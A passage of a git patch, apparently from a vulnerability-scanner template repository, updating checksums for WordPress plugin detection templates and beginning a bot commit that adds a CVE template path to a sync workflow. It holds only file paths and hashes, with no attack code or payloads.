+http/technologies/wordpress/plugins/header-footer-elementor.yaml:4d21952b916b194e828ed3cd60e13ff3528d6786 +http/technologies/wordpress/plugins/header-footer.yaml:69172dcc2f8d8b94407e93b071d0c7d7b11c9f6f +http/technologies/wordpress/plugins/health-check.yaml:0d3f8ad6f9818c3b9fc5834f5c46d0f42a52b72b +http/technologies/wordpress/plugins/hello-dolly.yaml:fb5b66126726747e9318c33b63b310c19ed55c6f +http/technologies/wordpress/plugins/host-webfonts-local.yaml:3d50940fa537e4857a59ae2861b0f85bb079e579 +http/technologies/wordpress/plugins/hostinger.yaml:c5c02274bb041901eb18f1fbed64e8ce027c84f2 +http/technologies/wordpress/plugins/image-optimization.yaml:a95462f9e94f795179db16fd251ef70dd866d817 +http/technologies/wordpress/plugins/imagify.yaml:f62a5df95cbbb28811ebb8afb3aaecf2a87d851f +http/technologies/wordpress/plugins/imsanity.yaml:1a7c472de1b562a8937f013004547e0dc4bb6c9d +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:3e012b09cd2e38093cbd4142d347861577356571 +http/technologies/wordpress/plugins/instagram-feed.yaml:a18fef5df70be71707ff08a91541c94a8287f31e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:6f146b7d8f15b0f4d5f5236d6bb9af8c05a2e2a7 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:ede984b4ce734efb80a4e76739cf7ab928759029 +http/technologies/wordpress/plugins/jetpack.yaml:722cfb18d959aafb8afc26c43ea5f1b9310e8ab4 +http/technologies/wordpress/plugins/kadence-blocks.yaml:dd88425752a11b8d27b65ff567fd5c7f5106e78f +http/technologies/wordpress/plugins/kirki.yaml:3e9b6be1c0c47a91c3ffd76853adbd854fec95b1 +http/technologies/wordpress/plugins/leadin.yaml:282ecda7ae4100485836e43caeae5388ab948606 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:87f3beae65c6f66a4ec477c7b9e558992daa5d3c +http/technologies/wordpress/plugins/limit-login-attempts.yaml:4c3c3da712a1507e644a8a619c31a1ddbec76b20 +http/technologies/wordpress/plugins/litespeed-cache.yaml:b0007a8b0e38ecec8766a35500bbc9a165bb5ae9 +http/technologies/wordpress/plugins/loco-translate.yaml:24d49706c8f3b2f7f3604850dfa7dce830d66cb7 +http/technologies/wordpress/plugins/loginizer.yaml:4d9c60f412eaf2e57c8d8614d4ceca82d54af8e5 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:c4bef61dda972f757c550a00b2fe5b50a0de3784 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:22c3c5417d4c8af8a89212aa6ac07a10e71a7732 +http/technologies/wordpress/plugins/mailpoet.yaml:67e27cb5bc2df5693075cf7a9b409c15055fe912 +http/technologies/wordpress/plugins/maintenance.yaml:fabddd6496243a1e21c704ab5b963760c37f1780 +http/technologies/wordpress/plugins/mainwp-child.yaml:9138156d8a2c7be8dcdaf06c5276347befae11c5 +http/technologies/wordpress/plugins/malcare-security.yaml:fdc06e0d715b26710f962088603a001ad5daa995 +http/technologies/wordpress/plugins/megamenu.yaml:75cefa3626597f13c637cda840fb78b2b4ff8ff1 +http/technologies/wordpress/plugins/members.yaml:8b3e2ee51aede3fa700b6858b3cdd6e982c3a841 +http/technologies/wordpress/plugins/meta-box.yaml:c324d861c8109f098a3d60d93ced4a9a18fec695 +http/technologies/wordpress/plugins/metform.yaml:92fd715d65f49ae60d11864e885a4ea8bdcffb60 +http/technologies/wordpress/plugins/ml-slider.yaml:7a96f603d51a0234b7ab39b364d3c7d8b8269c5a +http/technologies/wordpress/plugins/newsletter.yaml:0bc7ede2432ce5062414e91cbf31b4b57f08fd2b +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:2259f3e681019c6343762f6ed56343b061ca49b7 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:87ca6a94e7bffc305bf42bf5e92a72d382038897 +http/technologies/wordpress/plugins/ninja-forms.yaml:7d56c3ddcf42b2d521ecd570362adc6ceb12a8f1 +http/technologies/wordpress/plugins/ocean-extra.yaml:cda378e05af15537da466c7b4debeca5d6909d9c +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:8fc3c31ef5b912595c019787c1c88b06055e98ea +http/technologies/wordpress/plugins/one-click-demo-import.yaml:1b804e49cb1a289cea3b0fab6ecfef080bc79d3e +http/technologies/wordpress/plugins/optinmonster.yaml:1b08e516a103695be4f114bc2c70a776e077ea61 +http/technologies/wordpress/plugins/otter-blocks.yaml:639dc2eb19a0d30e36356b35e5b98d5140349538 +http/technologies/wordpress/plugins/password-protected.yaml:ebe6fdd554f6855d619bd98d76dbccbe744ef2e3 +http/technologies/wordpress/plugins/pdf-embedder.yaml:1b728679886b496441f8e421263e6dd5292f96de http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:98b6dfc3b57c003d57d99b95bf516b9bcadad493 +http/technologies/wordpress/plugins/pixelyoursite.yaml:f6965469b1c2ed0b7d4f3598eb2245f995fd0166 +http/technologies/wordpress/plugins/polylang.yaml:3082c4cccd71c6b020335333f985cd0a3a47f5d9 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:accba860c0824f01d73fab87c911b44c66491dd2 +http/technologies/wordpress/plugins/post-smtp.yaml:86079bfd82ecfe05f41a5f72fa55cce0c153f51e +http/technologies/wordpress/plugins/post-types-order.yaml:45b448df3710b39ed379314e288955a99194df55 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:08f6f1b761ff7eb4b93386a99ee263974c4ab704 +http/technologies/wordpress/plugins/pretty-link.yaml:ac78db275c6b93f2434055c928ef683ec5ad3587 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:8c58860bcef80599d8debd9751d880fe568828e5 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:5cc74a48b304b9e26cbeca26c84824faa7d77aa2 +http/technologies/wordpress/plugins/redirection.yaml:26d61bc05da848467438faacb28d0bfa9365cbb8 +http/technologies/wordpress/plugins/redux-framework.yaml:797ee7403fd614a538a27ce6842b1613cafe3585 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:aa5603a52170fc69e7cca53a9d054559e975d8df +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:d9d3ffe0d24c630d16cbf412b64c3db5a09e2697 +http/technologies/wordpress/plugins/safe-svg.yaml:347046db30ffa1db289a09ef4bad92131b7dc9d5 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:f411765e462ad03d66a43c62850b0e9732443c2b +http/technologies/wordpress/plugins/sg-cachepress.yaml:2606734d6dbbf985724b8dc77beca23281bdde99 +http/technologies/wordpress/plugins/sg-security.yaml:1f92f9c936f155c015ea2777b67cf07a536129b0 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a56a0df9a39978ad72f16140a410a9152f8a5edf +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:162b72837807ccd1d4bf18e54e51a491c876e235 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:4debc7be05869829a4ddbafd1408b9dfc3ec3d1f +http/technologies/wordpress/plugins/simple-history.yaml:cf14c9dbcd5a2823b27abbb7f8013927d929aba9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:aafe30b072ef77b59fd0c8adf8b689b8a8b534ea +http/technologies/wordpress/plugins/siteorigin-panels.yaml:cc15dcea1fcffcf1cd2d7480850750572aefe76f +http/technologies/wordpress/plugins/smart-slider-3.yaml:b7d2a0f1e58ffdb59602c82d93d8ec16f4f74c04 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:cf7a0e594a67d9bf3495083c65ad3dd696091b0d http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:7431bdf1ec1dd11a0ce83200c4e7eecf9035f15c +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:e54b87b0d1993c70a1e79f3586f4b5fcc1f69a1b +http/technologies/wordpress/plugins/sucuri-scanner.yaml:72984603e4f105d8eec4f0ec74fcb882b5feecb9 +http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:c82e6a886de6dd292ba78f68a5edbb100b802f68 +http/technologies/wordpress/plugins/tablepress.yaml:12a209f39e5d6c5a0ef1273bd990d53400f7477d +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:640cd544c1c6aa44da2d1c41d6e62b909e223cde +http/technologies/wordpress/plugins/templately.yaml:75907b9782d70a0b15bf233ab05b9dcb9fc1a7ae +http/technologies/wordpress/plugins/the-events-calendar.yaml:98f71a2686e68c36f087f762007a51efafb782e1 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:8f4358301a38628a2ccf5a6daef44def124d7189 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:4bff59b48f7139ec8dcbf2d14354b692b74b335f +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:c0886c23d9a8291ee06dc643a8e62af1ca0354b5 +http/technologies/wordpress/plugins/under-construction-page.yaml:47c02b2c5453a29ea422b70e57c3dc45b0f734fd http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:1764b3b37065c0af6c554171dfcc10792e0c5218 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:1e08b06e54eb3400dcf8032cbe3d3560f1868e3a http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:34d7011ca6ba5dc06fdc60b30eda88ddf49fe3e1 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:e2b5f4e45bb9362be1d7cd52d26240127fe0406d +http/technologies/wordpress/plugins/webp-express.yaml:deda558254c7bb7ec3502a4f0a0d2cb82a534b60 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:09b5bb138eb5c0d82e39401cdfca5fbb450f75b5 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:54ba6ea96a891b73a797f2d640ad80983772c45c +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:d1f0884ba3e2c41f15324f627bf299b2ceec25d7 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:e94a04f58201c61f74360ce2d429191ff8bbef4a http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c02d8b8907167efc1957f4bb90b3865efa050489 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:bcce8f61b06ab4e7860b8965ba66d12d27e5e072 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:c245c089a83d7b886f599c7aee6b213dec672fba +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:be918c0fbc91f2a05a507a4109eb3b8321282ee9 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:4314caa3d6967b53baa3faee5bfaf0865ea33cbb +http/technologies/wordpress/plugins/woocommerce-services.yaml:dc6dc2f31fb27d17a9b2c181afd70f8329f3553a +http/technologies/wordpress/plugins/woocommerce.yaml:6f88d2aa6f14a89e4fe3fd4b03546be6c221c14f +http/technologies/wordpress/plugins/wordfence.yaml:a7dbc70f71758b50f5e8e5541d168e13b0e31ebd +http/technologies/wordpress/plugins/wordpress-importer.yaml:6a70202c2965a18616513625fb01fe73e49d0daa +http/technologies/wordpress/plugins/wordpress-seo.yaml:64d417c0759af592d6f1207c635c05f2614b1e87 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:925e17a4bc0b5846249b0250e72140f9f9aa4b14 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:4d60f9bc688f5bcc53471a6efa1ae88339c4e5ab +http/technologies/wordpress/plugins/wp-file-manager.yaml:fedf1a15ff96e6bf4b4f726ab772e2c2fe9e0831 +http/technologies/wordpress/plugins/wp-google-maps.yaml:d1bf03acbf874ae4673386de463e9d75a2e9c43c +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:d60f81c9e6ab1d24ddc6f35588fc45622b7fa215 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:daf12a156ae8d7c6c147cec18087fa7701259659 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:0c53b252e195671dd3a87b48dafba308561f52db +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:a97eeb8fb7952c4eb0522cb31812f2648b36f15e +http/technologies/wordpress/plugins/wp-optimize.yaml:c6d9e8669ca1b890e031bcaeb80d6aeaf380c2be +http/technologies/wordpress/plugins/wp-pagenavi.yaml:0b19cd3d8934acd4f9c674d9e9fdc0f22ba6da2c +http/technologies/wordpress/plugins/wp-reset.yaml:e8a73eda5c3734c8496b26fd1c045713336ba61e +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4e31ae559d8e414aaea3dd88e12a839f78dc60f5 +http/technologies/wordpress/plugins/wp-rollback.yaml:d334260671f7da5686ae5880d859c17fd4cc73fa +http/technologies/wordpress/plugins/wp-seopress.yaml:527eb2cf14508c3a38adbc4a745aabc23e705436 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:4a744e660d68ef8ff9d6be727e1e753de300248b +http/technologies/wordpress/plugins/wp-smushit.yaml:85909bdd00880e138f99cb746cc52509bab4997d +http/technologies/wordpress/plugins/wp-statistics.yaml:50dd652e2b870e320d1f3dfcc8466e58ffa42f60 +http/technologies/wordpress/plugins/wp-super-cache.yaml:c75585c11b43540c5be523f1fcc5c92d7e879699 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:184a0bca0d198ff725dae2f1851e442157973362 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:e929146b632d95b570d2260d1496dd6d24011b02 +http/technologies/wordpress/plugins/wpforms-lite.yaml:8e76acc5264bd0c2a903afacc47ff08b55e0c794 +http/technologies/wordpress/plugins/wps-hide-login.yaml:88ca9409423c21d5a189a1c9c07d4ca2720ab964 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:66b06918fc4c54c8e10cd6a222be50a58ce05e96 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:8b4ba30f1bc172790a73d0dacdad66477042488c http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8874,7 +8876,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c8932cc37db88668f0222cf912925722240b4934 +templates-checksum.txt:3b4bbaf1bf19bc120be7a20619a150b65501e272 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e811b7061362d39744f20fefbc957acf8abda794 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 04:47:28 +0000 Subject: [PATCH 153/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2592a9098f7..adbd1e5b097 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2024/CVE-2024-5217.yaml' - 